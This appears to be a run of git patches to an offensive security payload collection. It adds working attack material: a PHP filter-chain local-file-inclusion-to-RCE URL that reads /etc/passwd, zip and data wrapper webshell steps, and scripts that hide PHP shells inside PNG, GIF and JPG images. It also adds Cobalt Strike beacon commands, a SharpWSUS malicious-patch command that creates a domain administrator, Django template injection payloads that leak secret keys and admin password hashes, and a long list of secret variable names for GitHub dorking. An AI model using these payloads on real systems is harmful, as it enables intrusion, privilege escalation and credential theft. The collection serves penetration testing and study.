"127.0.0.1:8000/index.php?0=id&file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/etc/passwd" +``` + + ### Wrapper zip:// -```python -echo "
" > payload.php; -zip payload.zip payload.php; -mv payload.zip shell.jpg; -rm payload.php +1. Create an evil payload: `echo "
" > payload.php;` +2. Zip the file + ```python + zip payload.zip payload.php; + mv payload.zip shell.jpg; + rm payload.php + ``` +3. Upload the archive and access the file using the wrappers: http://example.com/index.php?page=zip://shell.jpg%23payload.php -http://example.com/index.php?page=zip://shell.jpg%23payload.php -``` ### Wrapper data:// @@ -175,6 +187,7 @@ NOTE: the payload is "" Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : `http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+` + ### Wrapper expect:// ```powershell @@ -182,6 +195,7 @@ http://example.com/index.php?page=expect://id http://example.com/index.php?page=expect://ls ``` + ### Wrapper input:// Specify your payload in the POST parameters, this can be done with a simple `curl` command. @@ -196,6 +210,7 @@ Alternatively, Kadimus has a module to automate this attack. ./kadimus -u "https://example.com/index.php?page=php://input%00" -C '' -T input ``` + ### Wrapper phar:// Create a phar file with a serialized object in its meta-data. @@ -229,6 +244,7 @@ include('phar://test.phar'); NOTE: The unserialize is triggered for the phar:// wrapper in any file operation, `file_exists` and many more. + ## LFI to RCE via /proc/*/fd 1. Upload a lot of shells (for example : 100) @@ -243,6 +259,7 @@ GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1 User-Agent: ``` + ## LFI to RCE via upload If you can upload a file, just inject the shell payload in it (e.g : `` ). @@ -253,6 +270,7 @@ http://example.com/index.php?page=path/to/uploaded/file.png In order to keep the file readable it is best to inject into the metadata for the pictures/doc/pdf + ## LFI to RCE via upload (race) Worlds Quitest Let's Play" * Upload a file and trigger a self-inclusion. @@ -456,3 +474,5 @@ If SSH is active check which user is being used `/proc/self/status` and `/etc/pa * [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1) * [PHP LFI with Nginx Assistance](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/) * [PHP LFI to arbitrary code execution via rfc1867 file upload temporary files (EN) - gynvael.coldwind - 2011-03-18](https://gynvael.coldwind.pl/?id=376) +* [LFI2RCE via PHP Filters - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters) +* [Solving "includer's revenge" from hxp ctf 2021 without controlling any files - @loknop](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d) diff --git a/Methodology and Resources/Cobalt Strike - Cheatsheet.md b/Methodology and Resources/Cobalt Strike - Cheatsheet.md index affccdb..e84435c 100644 --- a/Methodology and Resources/Cobalt Strike - Cheatsheet.md +++ b/Methodology and Resources/Cobalt Strike - Cheatsheet.md @@ -337,6 +337,11 @@ Opsec safe Pass-the-Hash: ```powershell # Start a SOCKS server on the given port on your teamserver, tunneling traffic through the specified Beacon. Set the teamserver/port configuration in /etc/proxychains.conf for easy usage. beacon > socks [PORT] +beacon > socks [port] +beacon > socks [port] [socks4] +beacon > socks [port] [socks5] +beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password] +beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password] [enableLogging|disableLogging] # Proxy browser traffic through a specified Internet Explorer process. beacon > browserpivot [pid] [x86|x64] diff --git a/Upload Insecure Files/Picture Resize/GIF_exploit.gif b/Upload Insecure Files/Picture Compression/GIF_exploit.gif similarity index 100% rename from Upload Insecure Files/Picture Resize/GIF_exploit.gif rename to Upload Insecure Files/Picture Compression/GIF_exploit.gif diff --git a/Upload Insecure Files/Picture Resize/JPG_exploit-55.jpg b/Upload Insecure Files/Picture Compression/JPG_exploit-55.jpg similarity index 100% rename from Upload Insecure Files/Picture Resize/JPG_exploit-55.jpg rename to Upload Insecure Files/Picture Compression/JPG_exploit-55.jpg diff --git a/Upload Insecure Files/Picture Resize/PNG_110x110_resize_bypass_use_LFI.png b/Upload Insecure Files/Picture Compression/PNG_110x110_resize_bypass_use_LFI.png similarity index 100% rename from Upload Insecure Files/Picture Resize/PNG_110x110_resize_bypass_use_LFI.png rename to Upload Insecure Files/Picture Compression/PNG_110x110_resize_bypass_use_LFI.png diff --git a/Upload Insecure Files/Picture Resize/PNG_32x32_resize_bypass_use_LFI.png b/Upload Insecure Files/Picture Compression/PNG_32x32_resize_bypass_use_LFI.png similarity index 100% rename from Upload Insecure Files/Picture Resize/PNG_32x32_resize_bypass_use_LFI.png rename to Upload Insecure Files/Picture Compression/PNG_32x32_resize_bypass_use_LFI.png diff --git a/Upload Insecure Files/Picture Resize/exploit_JPG.py b/Upload Insecure Files/Picture Compression/createBulletproofJPG.py similarity index 97% rename from Upload Insecure Files/Picture Resize/exploit_JPG.py rename to Upload Insecure Files/Picture Compression/createBulletproofJPG.py index 14b8a09..c3e2bbb 100644 --- a/Upload Insecure Files/Picture Resize/exploit_JPG.py +++ b/Upload Insecure Files/Picture Compression/createBulletproofJPG.py @@ -1,7 +1,6 @@ #!/usr/bin/python """ - Bulletproof Jpegs Generator Copyright (C) 2012 Damien "virtualabs" Cauquil @@ -18,7 +17,11 @@ You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. - + + ------------- + # How to use + b.php?c=ls + Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l """ from __future__ import print_function diff --git a/Upload Insecure Files/Picture Resize/exploit_PNG_110x110.php b/Upload Insecure Files/Picture Compression/createCompressedPNG_110x110.php similarity index 100% rename from Upload Insecure Files/Picture Resize/exploit_PNG_110x110.php rename to Upload Insecure Files/Picture Compression/createCompressedPNG_110x110.php diff --git a/Upload Insecure Files/Picture Compression/createGIFwithGlobalColorTable.php b/Upload Insecure Files/Picture Compression/createGIFwithGlobalColorTable.php new file mode 100644 index 0000000..d505461 --- /dev/null +++ b/Upload Insecure Files/Picture Compression/createGIFwithGlobalColorTable.php @@ -0,0 +1,22 @@ +"; +$_width=200; +$_height=200; +if(strlen($_payload)%3!=0){ + echo "payload%3==0 !"; exit(); +} +$im = imagecreate($_width, $_height); +$_hex=unpack('H*',$_payload); + +$colors_hex=str_split($_hex[1], 6); + +for($i=0; $i < count($colors_hex); $i++){ + $_color_chunks=str_split($colors_hex[$i], 2); + $color=imagecolorallocate($im,hexdec($_color_chunks[0]),hexdec($_color_chunks[1]),hexdec($_color_chunks[2])); + imagesetpixel($im,$i,1,$color); +} + +imagegif($im,$_file); +?> \ No newline at end of file diff --git a/Upload Insecure Files/Picture Compression/createPNGwithPLTE.php b/Upload Insecure Files/Picture Compression/createPNGwithPLTE.php new file mode 100644 index 0000000..d5abcb7 --- /dev/null +++ b/Upload Insecure Files/Picture Compression/createPNGwithPLTE.php @@ -0,0 +1,28 @@ + "; +$_pay_len=strlen($_payload); +if(strlen($_payload)%3!=0){ + echo "payload%3==0 !"; exit(); +} + + +$width=$_pay_len/3; +$height=20; +//$im = imageCreateFromPng("existing.png"); +$im = imagecreate($width, $height); + +$_hex=unpack('H*',$_payload); +$_chunks=str_split($_hex[1], 6); + +for($i=0; $i < count($_chunks); $i++){ + + $_color_chunks=str_split($_chunks[$i], 2); + $color=imagecolorallocate($im,hexdec($_color_chunks[0]),hexdec($_color_chunks[1]),hexdec($_color_chunks[2])); + + imagesetpixel($im,$i,1,$color); + +} + +imagepng($im,"example.png"); \ No newline at end of file diff --git a/Upload Insecure Files/Picture Resize/README.txt b/Upload Insecure Files/Picture Resize/README.txt deleted file mode 100644 index 633f383..0000000 --- a/Upload Insecure Files/Picture Resize/README.txt +++ /dev/null @@ -1,5 +0,0 @@ -# How to use -b.php?c=ls - - -Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l \ No newline at end of file diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index 3f5bfba..585939a 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -9,7 +9,7 @@ * [Defaults extensions](#defaults-extensions) * [Upload tricks](#upload-tricks) * [Filename vulnerabilities](#filename-vulnerabilities) - * [Picture upload with LFI](#picture-upload-with-lfi) + * [Picture compression](#picture-compression-) * [Configuration Files](#configuration-files) * [CVE - Image Tragik](#cve---image-tragik) * [CVE - FFMpeg](#cve---ffmpeg) @@ -107,12 +107,16 @@ Also you upload: - HTML/SVG files to trigger an XSS - EICAR file to check the presence of an antivirus -### Picture upload with LFI +### Picture Compression -Valid pictures hosting PHP code. Upload the picture and use a **Local File Inclusion** to execute the code. The shell can be called with the following command : `curl 'http://localhost/test.php?0=system' --data "1='ls'"`. +Create valid pictures hosting PHP code. Upload the picture and use a **Local File Inclusion** to execute the code. The shell can be called with the following command : `curl 'http://localhost/test.php?0=system' --data "1='ls'"`. - Picture Metadata, hide the payload inside a comment tag in the metadata. - Picture Resize, hide the payload within the compression algorithm in order to bypass a resize. Also defeating `getimagesize()` and `imagecreatefromgif()`. + - [JPG](https://virtualabs.fr/Nasty-bulletproof-Jpegs-l): use createBulletproofJPG.py + - [PNG](https://blog.isec.pl/injection-points-in-popular-image-formats/): use createPNGwithPLTE.php + - [GIF](https://blog.isec.pl/injection-points-in-popular-image-formats/): use createGIFwithGlobalColorTable.php + ### Picture with custom metadata @@ -198,4 +202,5 @@ Upload the XML file to `$JETTY_BASE/webapps/` * [File Upload - Mahmoud M. Awali / @0xAwali](https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/edit#slide=id.ga2ef157b83_1_0) * [IIS - SOAP](https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap) * [Arbitrary File Upload Tricks In Java - pyn3rd](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/) -* [File Upload - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-upload) \ No newline at end of file +* [File Upload - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-upload) +* [Injection points in popular image formats - Daniel Kalinowski‌‌ - Nov 8, 2019](https://blog.isec.pl/injection-points-in-popular-image-formats/) \ No newline at end of file From 343d63f79fde7e077cd9757246a83db64e344d7d Mon Sep 17 00:00:00 2001 From: 0xsry0 <67317571+0xsyr0@users.noreply.github.com> Date: Wed, 24 Aug 2022 09:10:55 +0200 Subject: [PATCH 20/69] Quick fix for WSUS malicious patch Not sure if it is deprecated but by tackling the box Outdated on HTB, the command didn't worked with two `&&`. To concatenate `"net user WSUSDemo Password123! /add ` and `net localgroup administrators WSUSDemo /add\""`, the `^&` is required. --- Methodology and Resources/Active Directory Attack.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 8d4e0b0..c8a2c4c 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -3528,7 +3528,7 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th 1. Locate using `HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate` or `SharpWSUS.exe locate` 2. After WSUS Server compromise: `SharpWSUS.exe inspect` -3. Create a malicious patch: `SharpWSUS.exe create /payload:"C:\Users\ben\Documents\pk\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user WSUSDemo Password123! /add && net localgroup administrators WSUSDemo /add\"" /title:"WSUSDemo"` +3. Create a malicious patch: `SharpWSUS.exe create /payload:"C:\Users\ben\Documents\pk\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user WSUSDemo Password123! /add ^& net localgroup administrators WSUSDemo /add\"" /title:"WSUSDemo"` 4. Deploy it on the target: `SharpWSUS.exe approve /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local /groupname:"Demo Group"` 5. Check status deployment: `SharpWSUS.exe check /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local` 6. Clean up: `SharpWSUS.exe delete /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local /groupname:”Demo Group` From 871b3bcaf2623a097b79d7d246d10eb1cba6c23e Mon Sep 17 00:00:00 2001 From: Techbrunch Date: Tue, 30 Aug 2022 13:50:03 +0200 Subject: [PATCH 21/69] Add Django Templates SSTI --- Server Side Template Injection/README.md | 54 ++++++++++++++++++++++++ 1 file changed, 54 insertions(+) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 797af48..4bb1228 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -33,6 +33,7 @@ - [Java - Basic injection](#java---basic-injection) - [Java - Retrieve the system’s environment variables](#java---retrieve-the-systems-environment-variables) - [Java - Retrieve /etc/passwd](#java---retrieve-etcpasswd) + - [Django Template](#django-template) - [Jinja2](#jinja2) - [Jinja2 - Basic injection](#jinja2---basic-injection) - [Jinja2 - Template format](#jinja2---template-format) @@ -337,6 +338,58 @@ ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().ex --- +## Django Templates + +Django template language supports 2 rendering engines by default: Django Templates (DT) and Jinja2. Django Templates is much simpler engine. It does not allow calling of passed object functions and impact of SSTI in DT is often less severe than in Jinja2. + +### Django Templates for post-exploitation + +```python +# Variables +{{ variable }} +{{ variable.attr }} + +# Filters +{{ value|length }} + +# Tags +{% csrf_token %} +``` + +### Cross-site scripting + +```python +{{ '' }} +{{ '' | safe }} +``` + +### Debug information leak + +```python +{% debug %} +``` + +### Leaking app’s Secret Key + +```python +{{ messages.storages.0.signer.key }} +``` + +### Admin Site URL leak + + +``` +{% include 'admin/base.html' %} +``` + +### Admin username and password hash leak + + +``` +{% load log %}{% get_admin_log 10 as log %}{% for e in log %} +{{e.user.get_username}} : {{e.user.password}}{% endfor %} +``` + ## Jinja2 [Official website](https://jinja.palletsprojects.com/) @@ -893,3 +946,4 @@ $str.valueOf($chr.toChars($out.read())) * [Lab: Server-side template injection in an unknown language with a documented exploit](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-in-an-unknown-language-with-a-documented-exploit) * [Exploiting Less.js to Achieve RCE](https://www.softwaresecured.com/exploiting-less-js/) * [A Pentester's Guide to Server Side Template Injection (SSTI)](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti) +* [Django Templates Server-Side Template Injection](https://lifars.com/wp-content/uploads/2021/06/Django-Templates-Server-Side-Template-Injection-v1.0.pdf) From 7850928d41f5c9c5d6580c5ad30472feff332294 Mon Sep 17 00:00:00 2001 From: Techbrunch Date: Tue, 30 Aug 2022 13:54:59 +0200 Subject: [PATCH 22/69] Add detection --- Server Side Template Injection/README.md | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 4bb1228..1b9b036 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -342,6 +342,15 @@ ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().ex Django template language supports 2 rendering engines by default: Django Templates (DT) and Jinja2. Django Templates is much simpler engine. It does not allow calling of passed object functions and impact of SSTI in DT is often less severe than in Jinja2. +### Detection + + +```python +{% csrf_token %} # Causes error with Jinja2 +{{ 7*7 }} # Error with Django Templates +ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r +``` + ### Django Templates for post-exploitation ```python From 811863501b3b0f1a1a36c966ceb99fc005d5f031 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 3 Sep 2022 12:07:24 +0200 Subject: [PATCH 23/69] ESC9 - No Security Extension --- .../Files/github-dorks.txt | 1401 +++++++++++++++++ .../Active Directory Attack.md | 42 + .../Windows - Privilege Escalation.md | 1 + README.md | 19 +- YOUTUBE.md | 6 +- 5 files changed, 1464 insertions(+), 5 deletions(-) create mode 100644 Insecure Source Code Management/Files/github-dorks.txt diff --git a/Insecure Source Code Management/Files/github-dorks.txt b/Insecure Source Code Management/Files/github-dorks.txt new file mode 100644 index 0000000..60a7730 --- /dev/null +++ b/Insecure Source Code Management/Files/github-dorks.txt @@ -0,0 +1,1401 @@ +GITHUB_TOKEN= +PATH= +CODECLIMATE_REPO_TOKEN= +DOCKER_PASSWORD= +NPM_TOKEN= +GH_TOKEN= +encrypted_02ddd67d5586_iv= +encrypted_517c5824cb79_key= +encrypted_02ddd67d5586_key= +encrypted_517c5824cb79_iv= +encrypted_1366e420413c_key= +encrypted_1366e420413c_iv= +DOCKER_USERNAME= +ARTIFACTS_SECRET= +ARTIFACTS_KEY= +SURGE_TOKEN= +SURGE_LOGIN= +ARTIFACTS_BUCKET= +SAUCE_ACCESS_KEY= +SAUCE_USERNAME= +DB_USER= +DB_PORT= +DB_HOST= +DBP= +javascriptEnabled= +acceptSslCerts= +AWS_ACCESS_KEY_ID= +AWS_SECRET_ACCESS_KEY= +DOCKER_EMAIL= +GH_USER_EMAIL= +GH_USER_NAME= +CLOUDINARY_URL= +COVERALLS_REPO_TOKEN= +CF_PASSWORD= +CF_SPACE= +CF_USERNAME= +CF_ORGANIZATION= +WPT_REPORT_API_KEY= +USABILLA_ID= +encrypted_17b59ce72ad7_key= +encrypted_17b59ce72ad7_iv= +NGROK_TOKEN= +rotatable= +CLOUDINARY_URL_STAGING= +encrypted_2c8d10c8cc1d_key= +encrypted_2c8d10c8cc1d_iv= +SRCCLR_API_TOKEN= +NPM_AUTH_TOKEN= +takesScreenshot= +GH_UNSTABLE_OAUTH_CLIENT_SECRET= +GH_OAUTH_CLIENT_SECRET= +GH_NEXT_UNSTABLE_OAUTH_CLIENT_SECRET= +GH_UNSTABLE_OAUTH_CLIENT_ID= +GH_OAUTH_CLIENT_ID= +GH_NEXT_OAUTH_CLIENT_ID= +GH_NEXT_UNSTABLE_OAUTH_CLIENT_ID= +GH_NEXT_OAUTH_CLIENT_SECRET= +marionette= +NPM_CONFIG_AUDIT= +FTP_PW= +FTP_LOGIN= +NPM_CONFIG_STRICT_SSL= +--ignore-ssl-errors= +TRAVIS_SECURE_ENV_VARS= +FOSSA_API_KEY= +VIP_GITHUB_DEPLOY_KEY= +SIGNING_KEY_SID= +SIGNING_KEY_SECRET= +ACCOUNT_SID= +API_KEY_SID= +API_KEY_SECRET= +CI_DEPLOY_PASSWORD= +CONFIGURATION_PROFILE_SID_SFU= +CONFIGURATION_PROFILE_SID_P2P= +ANACONDA_TOKEN= +CC_TEST_REPORTER_ID= +OS_TENANT_NAME= +OS_TENANT_ID= +OS_PROJECT_NAME= +OS_AUTH_URL= +OS_USERNAME= +OS_PASSWORD= +OS_REGION_NAME= +node_pre_gyp_secretAccessKey= +node_pre_gyp_accessKeyId= +encrypted_a2e547bcd39e_key= +encrypted_a2e547bcd39e_iv= +encrypted_17cf396fcb4f_key= +encrypted_17cf396fcb4f_iv= +datadog_api_key= +accessibilityChecks= +acceptInsecureCerts= +CI_DEPLOY_USERNAME= +cssSelectorsEnabled= +SONATYPE_PASSWORD= +tester_keys_password= +GITHUB_OAUTH_TOKEN= +webStorageEnabled= +locationContextEnabled= +nativeEvents= +handlesAlerts= +databaseEnabled= +browserConnectionEnabled= +applicationCacheEnabled= +hasTouchScreen= +takesHeapSnapshot= +networkConnectionEnabled= +mobileEmulationEnabled= +scope= +ALGOLIA_API_KEY= +encrypted_e05f6ccc270e_key= +encrypted_e05f6ccc270e_iv= +DANGER_GITHUB_API_TOKEN= +PYPI_PASSWORD= +VIP_GITHUB_BUILD_REPO_DEPLOY_KEY= +SSMTP_CONFIG= +COVERITY_SCAN_TOKEN= +CODECOV_TOKEN= +SIGNING_KEY= +GPG_ENCRYPTION= +NEW_RELIC_BETA_TOKEN= +ALGOLIA_APPLICATION_ID= +PACKAGECLOUD_TOKEN= +takesElementScreenshot= +raisesAccessibilityExceptions= +DOCKER_USER= +datadog_app_key= +encrypted_cb02be967bc8_key= +encrypted_cb02be967bc8_iv= +MAPBOX_ACCESS_TOKEN= +GITHUB_DEPLOYMENT_TOKEN= +ROPSTEN_PRIVATE_KEY= +RINKEBY_PRIVATE_KEY= +KOVAN_PRIVATE_KEY= +bintrayUser= +sonatypeUsername= +sonatypePassword= +bintrayKey= +SECRET_1= +SECRET_0= +SECRET_9= +SECRET_8= +SECRET_7= +SECRET_6= +SECRET_5= +SECRET_4= +SECRET_3= +SECRET_2= +SECRET_11= +SECRET_10= +TRAVIS_COM_TOKEN= +AWS_DEFAULT_REGION= +GITHUB_ACCESS_TOKEN= +PYPI_USERNAME= +BINTRAY_APIKEY= +BUNDLE_ZDREPO__JFROG__IO= +COCOAPODS_TRUNK_TOKEN= +OCTEST_SERVER_BASE_URL= +OCTEST_APP_USERNAME= +OCTEST_APP_PASSWORD= +OKTA_CLIENT_TOKEN= +HEROKU_API_KEY= +DATABASE_PASSWORD= +encrypted_0d22c88004c9_key= +encrypted_0d22c88004c9_iv= +BUNDLESIZE_GITHUB_TOKEN= +IOS_DOCS_DEPLOY_TOKEN= +COVERALLS_TOKEN= +CLOUDINARY_URL_EU= +HEROKU_API_USER= +OKTA_CLIENT_ORGURL= +VIRUSTOTAL_APIKEY= +PUSHOVER_USER= +PUSHOVER_TOKEN= +HB_CODESIGN_KEY_PASS= +HB_CODESIGN_GPG_PASS= +isbooleanGood= +BROWSER_STACK_USERNAME= +BROWSER_STACK_ACCESS_KEY= +SNYK_TOKEN= +rTwPXE9XlKoTn9FTWnAqF3MuWaLslDcDKYEh7OaYJjF01piu6g4Nc= +lr7mO294= +NtkUXxwH10BDMF7FMVlQ4zdHQvyZ0= +AURORA_STRING_URL= +TREX_OKTA_CLIENT_TOKEN= +TREX_OKTA_CLIENT_ORGURL= +GPG_PASSPHRASE= +encrypted_5d419efedfca_key= +encrypted_5d419efedfca_iv= +ACCESS_KEY_SECRET= +ACCESS_KEY_ID= +props.disabled= +ALGOLIA_API_KEY_MCM= +BINTRAY_API_KEY= +DOCKER_PASS= +TRIGGER_API_COVERAGE_REPORTER= +FIREBASE_TOKEN= +OSSRH_USERNAME= +7QHkRyCbP98Yv2FTXrJFcx9isA2viFx2UxzTsvXcAKHbCSAw= +dockerhubUsername= +dockerhubPassword= +SECRET_KEY_BASE= +repoToken= +encrypted_28c9974aabb6_key= +encrypted_28c9974aabb6_iv= +SONATYPE_USERNAME= +NGROK_AUTH_TOKEN= +FI2_SIGNING_SEED= +FI2_RECEIVING_SEED= +FI1_SIGNING_SEED= +FI1_RECEIVING_SEED= +CONTENTFUL_ORGANIZATION= +CONTENTFUL_ACCESS_TOKEN= +ANSIBLE_VAULT_PASSWORD= +FIREBASE_PROJECT= +ALGOLIA_SEARCH_API_KEY= +BINTRAY_USER= +encrypted_fb9a491fd14b_key= +encrypted_fb9a491fd14b_iv= +CODACY_PROJECT_TOKEN= +MANAGEMENT_TOKEN= +CONFIGURATION_PROFILE_SID= +NOW_TOKEN= +encrypted_90a9ca14a0f9_key= +encrypted_90a9ca14a0f9_iv= +IJ_REPO_USERNAME= +IJ_REPO_PASSWORD= +GITHUB_KEY= +pLytpSCciF6t9NqqGZYbBomXJLaG84= +encrypted_8a915ebdd931_key= +encrypted_8a915ebdd931_iv= +encrypted_0fb9444d0374_key= +encrypted_0fb9444d0374_iv= +encrypted_b98964ef663e_key= +encrypted_b98964ef663e_iv= +encrypted_50ea30db3e15_key= +encrypted_50ea30db3e15_iv= +SONAR_TOKEN= +API_KEY= +encrypted_a47108099c00_key= +encrypted_a47108099c00_iv= +OSSRH_SECRET= +GH_API_KEY= +PROJECT_CONFIG= +encrypted_f19708b15817_key= +encrypted_f19708b15817_iv= +encrypted_568b95f14ac3_key= +encrypted_568b95f14ac3_iv= +encrypted_4664aa7e5e58_key= +encrypted_4664aa7e5e58_iv= +ORG_GRADLE_PROJECT_SONATYPE_NEXUS_USERNAME= +ORG_GRADLE_PROJECT_SONATYPE_NEXUS_PASSWORD= +encrypted_54c63c7beddf_key= +encrypted_54c63c7beddf_iv= +CONTENTFUL_INTEGRATION_SOURCE_SPACE= +CONTENTFUL_INTEGRATION_MANAGEMENT_TOKEN= +BLUEMIX_API_KEY= +UzhH1VoXksrNQkFfc78sGxD0VzLygdDJ7RmkZPeBiHfX1yilToi1yrlRzRDLo46LvSEEiawhTa1i9W3UGr3p4LNxOxJr9tR9AjUuIlP21VEooikAhRf35qK0= 